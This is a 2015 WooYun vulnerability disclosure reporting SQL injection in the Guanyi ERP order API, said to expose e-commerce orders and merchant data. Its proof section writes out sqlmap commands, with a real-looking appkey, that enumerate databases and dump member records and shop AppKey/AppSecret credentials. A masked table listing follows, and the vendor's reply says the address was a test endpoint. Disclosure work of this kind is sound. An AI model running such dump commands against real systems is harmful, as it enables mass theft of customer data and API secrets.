当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0160767

漏洞标题:互联网千万级订单/几十万商家信息泄漏/涉及淘宝、京东等多家电商

相关厂商:上海管易云计算软件有限公司

漏洞作者: superbing

提交时间:2015-12-13 14:44

修复时间:2016-01-18 11:32

公开时间:2016-01-18 11:32

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-13: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-18: 细节向公众公开

简要描述:

求闪电~~~
互联网千万级订单,几十万商家信息泄漏。涉及淘宝、京东等电商。据猜测,黑市上出售的淘宝、天猫、京东等当天订单肯定有部分出自这里!
说明下:
千万订单不夸张,请管理审核时候跑下数据,这个漏洞是2个月前发现的,忘记提交了。今天周末,整理下提交了。有些具体情况,记不太清楚了。现在网速有点慢,挨个跑表不现实,以淘宝为例大概跑下。大概的数据量记得很清楚,千万级,几十万店铺不夸张。库里都存有各店铺在电商原始调用的key等信息,可以直接调用最新数据。

详细说明:

这种厂商管理这么电商的这么多订单,本身就是个严重的安全缺陷罗。天猫也好京东也好安全做得很好,但提供这些API接口给周边小公司管理商家订单照样是大安全问题。此次问题出在一个订单管理ERP,貌似是此类管理软件中用户量最多的,管易ERP系统。涉及的店铺很多。韩都衣舍、雪中飞、鸿星尔克、红蜻蜓。。。。deng等等等。反正N多了!
案例地址:http://**.**.**.**/index.php?m=content&c=index&a=lists&catid=18

1.JPG


以下截取自管易的官方说明。

一、什么是管易ERP_API平台
管易ERP_API平台 是基于管易ERP电子商务业务的API平台,提供管易客户参与服务管易用户的各类原材料。我们的使命是管易电子商务基础服务,像水、电、煤一样输送给有需要的管易客户。
二、API可实现的典型功能
可实现 B2C网站 与 管易软件 的数据同步

漏洞证明:

简单点讲就是个API接口存在sql注入的问题。
往严重的讲就是这个API可以查询到N多信息,造成N多信息泄漏的问题。
注入:

sqlmap -u "**.**.**.**:30001/data.dpk?method=ecerp.trade.orders&appkey=2F14E5396A894C019BF78A7D6D3FC593" --dbms mysql --dbs


2.JPG


会员信息:

sqlmap -u "**.**.**.**:30001/data.dpk?method=ecerp.trade.orders&appkey=2F14E5396A894C019BF78A7D6D3FC593" --dump -T "huiyuan" -D "odkcgerp"


以淘宝店铺信息:

sqlmap -u "**.**.**.**:30001/data.dpk?method=ecerp.trade.orders&appkey=2F14E5396A894C019BF78A7D6D3FC593" --dump -C “DPJC,nick,AppKey,AppSecret” -T "tb_dianpu" -D "odkcgerp" --threads 55


这个带nick,AppKey,AppSecret 的哦!干啥用的?我不知道!嘿嘿!

http://**.**.**.**/doc2/detail.htm?articleId=101587&docType=1&treeId=2#s3


附带所有表名:

|Database: odkcgerp
[777 tables]


mask 区域


*****----------*****
*****tail      *****
*****am        *****
*****          *****
*****ail       *****
*****tail      *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ig        *****
*****igexcludep*****
*****igshop    *****
*****eldelivery*****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****t         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****tings     *****
*****g         *****
*****ttings    *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ch        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ry        *****
*****d         *****
*****          *****
*****          *****
*****          *****
*****r         *****
*****rder      *****
*****          *****
*****obile_log *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ss        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ry        *****
*****rylog     *****
*****          *****
*****          *****
*****          *****
*****able      *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****npu       *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****msfail    *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****il        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****able      *****
*****e         *****
*****          *****
*****pt        *****
*****          *****
*****load      *****
*****sfer      *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****s         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****chase_calc*****
*****chase_deta*****
*****l         *****
*****          *****
*****          *****
*****l         *****
*****edetail   *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****detail    *****
*****          *****
*****          *****
*****          *****
*****ition     *****
*****apermition*****
*****apermition*****
*****ition     *****
*****ion       *****
*****          *****
*****          *****
*****ament_conf*****
*****config    *****
*****ail       *****
*****ail_archiv*****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****egory     *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****u         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****111111    *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****111111    *****
*****          *****
*****          *****
*****          *****
*****port      *****
*****          *****
*****_history  *****
*****_temp     *****
*****ad        *****
*****ad_history*****
*****          *****
*****_history  *****
*****_temp     *****
*****ion       *****
*****ion_temp  *****
*****e         *****
*****e_temp    *****
*****          *****
*****ementdate *****
*****ementpuhuo*****
*****ementpuhuo*****
*****ementsp   *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ice       *****
*****          *****
*****detail    *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****g         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****uo        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****xw        *****
*****kd        *****
*****          *****
*****ity       *****
*****          *****
*****          *****
*****ing       *****
*****an        *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****g         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****l         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ce        *****
*****ce_back_20*****
*****          *****
*****          *****
*****ack       *****
*****port      *****
*****port_back *****
*****          *****
*****          *****
*****nt        *****
*****nt_back   *****
*****detail    *****
*****detail_bac*****
*****nt        *****
*****nt_back   *****
*****rd        *****
*****rd_back   *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****sdk       *****
*****          *****
*****          *****
*****temptable *****
*****          *****
*****mentdate  *****
*****pdatedate *****
*****trace     *****
*****          *****
*****          *****
*****          *****
*****          *****
*****n         *****
*****k         *****
*****          *****
*****x         *****
*****x12       *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****o         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****ng        *****
*****n         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****chive     *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****nfo       *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****o         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****g         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****area      *****
*****          *****
*****smap      *****
*****          *****
*****          *****
*****          *****
*****ription   *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****tion      *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****d         *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****          *****
*****         *****







+-------------------------------------+


修复方案:

你们比我懂!

版权声明:转载请注明来源 superbing@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-12-14 10:37

厂商回复:

感谢发现漏洞.这个是我们官网提供的API测试地址,不影响大量真实客户数据.

最新状态:

暂无